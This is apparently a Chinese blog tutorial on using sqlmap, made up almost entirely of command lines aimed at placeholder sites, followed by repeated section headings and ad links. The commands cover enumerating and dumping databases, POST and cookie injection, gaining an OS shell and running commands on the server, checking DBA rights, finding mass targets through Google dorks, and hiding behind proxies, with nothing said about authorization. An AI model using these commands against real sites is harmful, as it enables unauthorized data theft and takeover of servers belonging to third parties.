sqlmap的使用姿势

安装sqlmap

sqlmap是用python写的，所以先安装python，这里不介绍python安装方法自行百度。

sqlmap下载地址下载之后解压就好了。

普通注入, -u 是URL地址，他会自动找到第一个参数 id

sqlmap.py -u "http://www.domain.com/news_info.asp?id=244"

获取数据库

sqlmap.py -u "http://www.domain.com/news_info.asp?id=244" --dbs

获取表

sqlmap.py -u "http://www.domain.com/news_info.asp?id=244" -D “数据库” --tables

获取表里的字段

sqlmap.py -u "http://www.domain.com/news_info.asp?id=244" -D “数据库” -T "表" --columns

获取字段里的信息, 多个字段用逗号分隔

sqlmap.py -u "http://www.domain.com/news_info.asp?id=244" -D “数据库” -T "表" -C "字段,字段" --dump

POST注入的两种方法

第一种，–data 是发送body里的字段 -p 是要注入的参数

sqlmap.py -u "http://www.domain.com/news_info.asp" --data="id=244" -p "id"

第二种，抓包后保存成txt文件, -r 指定你的文本

sqlmap.py -r sqlmap.txt -p "username"

自动搜索注入, 会找到当前页面的表单进行注入

sqlmap.py -u "http://www.domain.com/news_info.asp" --forms

sqlmap.py -u "http://www.domain.com/news_info.asp" --cookie "ID=1490" --level 2

伪静态注入, 伪静态指定是没有查询参数，只要在注入点里加*

sqlmap.py -u "http://www.domain.cn/index.php/Article/index/id/1161*"

交互写shell及命令执行,需要有足够大的权限, 前提知道网站路径

会让你选择网站语言，php还是asp等，然后输入你的网站根目录

sqlmap.py -u "http://www.domain.cn/index.php/Article/index/id/1161" --os-shell

执行命令

sqlmap.py -u "http://www.domain.cn/index.php/Article/index/id/1161" --os-cmd=ipconfig

延时注入, --delay 后面是1秒, --safe-freq 测试频率,可以不要

sqlmap.py -u "http://www.domain.cn/index.php/Article/index/id/1161" --delay 1 --safe-freq 3

谷歌搜索批量检测注入(很少用到，因为能注入的几率很小)

sqlmap.py -g inurl:php?id=

查看权限

sqlmap.py -u "http://www.domain.com.cn/news_info.asp?id=244" --privileges

当前用户

sqlmap.py -u "http://www.domain.com.cn/news_info.asp?id=244" --current-user

是否dba权限，这个权限很大，有了他无所不能

sqlmap.py -u "http://www.domain.com.cn/news_info.asp?id=244" --is-dba

当前数据库名

sqlmap.py -u "http://www.domain.com.cn/news_info.asp?id=244" --current-db

获取banner信息

sqlmap.py -u "http://www.domain.com.cn/news_info.asp?id=244" -b

自动化测试注入, 他会帮你自动 y/n

sqlmap.py -u "http://www.domain.com.cn" --batch

爬行网站URL，后面跟的参数是爬行的深度–crawl 是爬取深度

sqlmap.py -u "http://www.domain.com.cn" --batch --crawl=3

代理注入，很多时候会挂掉–proxy 代理地址

sqlmap.py -u "http://www.domain.com.cn/news_info.asp?id=244" --proxy="http://代理IP:端口"

使用文件去代理

sqlmap.py -u "http://www.domain.com.cn/news_info.asp?id=244" --proxy-file="代理IP文件路径"

安装sqlmap

普通注入, -u 是URL地址，他会自动找到第一个参数 id

获取数据库

获取表

获取表里的字段

获取字段里的信息, 多个字段用逗号分隔

POST注入的两种方法

自动搜索注入, 会找到当前页面的表单进行注入

伪静态注入, 伪静态指定是没有查询参数，只要在注入点里加*

交互写shell及命令执行,需要有足够大的权限, 前提知道网站路径

延时注入, --delay 后面是1秒, --safe-freq 测试频率,可以不要

谷歌搜索批量检测注入(很少用到，因为能注入的几率很小)

查看权限

当前用户

是否dba权限，这个权限很大，有了他无所不能

当前数据库名

获取banner信息

自动化测试注入, 他会帮你自动 y/n

爬行网站URL，后面跟的参数是爬行的深度–crawl 是爬取深度

代理注入，很多时候会挂掉–proxy 代理地址

使用文件去代理

官方大流量卡

上云优惠聚集地

sqlmap的使用姿势

安装sqlmap

普通注入, -u 是URL地址，他会自动找到第一个参数 id

获取数据库

获取表

获取表里的字段

获取字段里的信息, 多个字段用逗号分隔

POST注入的两种方法

自动搜索注入, 会找到当前页面的表单进行注入

cookie 注入,

伪静态注入, 伪静态指定是没有查询参数，只要在注入点里加*

交互写shell及命令执行,需要有足够大的权限, 前提知道网站路径

延时注入, --delay 后面是1秒, --safe-freq 测试频率,可以不要

谷歌搜索批量检测注入(很少用到，因为能注入的几率很小)

查看权限

当前用户

是否dba权限，这个权限很大，有了他无所不能

当前数据库名

获取banner信息

自动化测试注入, 他会帮你自动 y/n

爬行网站URL，后面跟的参数是爬行的深度–crawl 是爬取深度

代理注入，很多时候会挂掉–proxy 代理地址

使用文件去代理

官方大流量卡

上云优惠聚集地